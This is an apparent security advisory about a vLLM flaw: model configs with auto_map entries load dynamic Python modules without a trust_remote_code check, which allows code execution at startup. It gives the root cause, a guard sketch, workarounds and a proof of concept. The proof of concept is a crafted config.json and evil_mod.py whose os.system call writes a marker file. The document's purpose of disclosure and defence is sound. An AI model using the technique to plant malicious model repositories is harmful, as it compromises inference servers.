Published January 12, 2026
vLLM Remote Code Execution via auto_map Dynamic Module Loading
BugBunny.ai discovered a critical vulnerability in vLLM where Hugging Face auto_map dynamic modules are loaded during model resolution without gating on trust_remote_code, allowing attacker-controlled Python code in a model repo/path to execute at server startup.
TL;DR
- Arbitrary code execution during model initialization
- Triggered by auto_map entries in the model's config.json
Root Cause
During model resolution, vLLM unconditionally iterates auto_map entries from the model config and calls try_get_class_from_dynamic_module, which delegates to Transformers' get_class_from_dynamic_module and executes the module code.
This occurs even when trust_remote_code is False, allowing a malicious model repo to embed arbitrary Python code in a referenced module and have it executed during initialization—before any request handling and without requiring API access.
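The missing check can be illustrated with a minimal sketch. The function name `resolve_auto_map` and its signature are hypothetical, not vLLM's actual code; the point is that any auto_map resolution must refuse to proceed when trust_remote_code is False, since importing a referenced module executes its top-level code:

```python
# Hypothetical sketch of the guard vLLM was missing: auto_map resolution
# must be gated on trust_remote_code BEFORE any dynamic module is imported,
# because importing the module runs attacker-controlled top-level code.
def resolve_auto_map(config: dict, trust_remote_code: bool) -> list[str]:
    auto_map = config.get("auto_map") or {}
    if auto_map and not trust_remote_code:
        # Fail closed: never import repo-supplied modules without opt-in.
        raise ValueError(
            "config.json contains auto_map entries but trust_remote_code "
            "is False; refusing to load dynamic module code"
        )
    # With trust_remote_code=True, each entry (e.g. "evil_mod.EvilConfig")
    # would be handed to Transformers' get_class_from_dynamic_module,
    # which imports the module and returns the class.
    return list(auto_map.values())
```

The vulnerable path skipped this gate entirely, so the module import (and its side effects) happened regardless of the operator's setting.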
Proof of Concept
A malicious model directory with a crafted config.json and Python module achieves arbitrary code execution when vLLM loads the model.
# 1. Create malicious model directory with config.json
{
  "model_type": "llama",
  "architectures": ["LlamaForCausalLM"],
  "auto_map": {
    "AutoConfig": "evil_mod.EvilConfig",
    "AutoModel": "evil_mod.EvilModel"
  }
}

# 2. Add malicious module (evil_mod.py)
import os
os.system("echo vllm_rce > /tmp/vllm_auto_map_rce")

class EvilConfig:
    ...

class EvilModel:
    ...

# 3. Start vLLM (trust_remote_code=False doesn't help!)
vllm serve ./malicious-model --model-impl transformers

# 4. Result: /tmp/vllm_auto_map_rce is created during model init
# Arbitrary code execution achieved without API access!
# Vulnerable code path:
# vllm/model_executor/models/registry.py:856 — auto_map resolution
# vllm/transformers_utils/dynamic_module.py:13 — get_class_from_dynamic_module
# ❌ No trust_remote_code check before executing dynamic module code
Vulnerable Code Path
vllm/model_executor/models/registry.py: auto_map resolution without a trust check
vllm/transformers_utils/dynamic_module.py: delegates to Transformers' get_class_from_dynamic_module
Workarounds
- Only load trusted model repositories and local paths.
- Avoid untrusted auto_map entries in model configs.
- If possible, disable or strictly guard dynamic module loading before initialization.
- Run vLLM in isolated environments with minimal privileges.
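As a practical aid for the second workaround, operators can vet a local model directory before pointing vLLM at it. The helper below is an illustrative sketch (the function name `find_auto_map_entries` is ours, not part of vLLM); it simply surfaces any auto_map entries in config.json so they can be reviewed:

```python
import json
from pathlib import Path


def find_auto_map_entries(model_dir: str) -> dict:
    """Return the auto_map entries from a local model directory's
    config.json, so an operator can review which dynamic modules the
    repo would ask the loader to import. An empty dict means the config
    declares no dynamic modules."""
    config = json.loads((Path(model_dir) / "config.json").read_text())
    return config.get("auto_map", {})
```

A non-empty result is not proof of malice, but it means the directory ships Python that would run at load time and should be audited first.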
Credits & Disclosure
Identified by the BugBunny.ai research team and reported to the vLLM maintainers for coordinated disclosure.
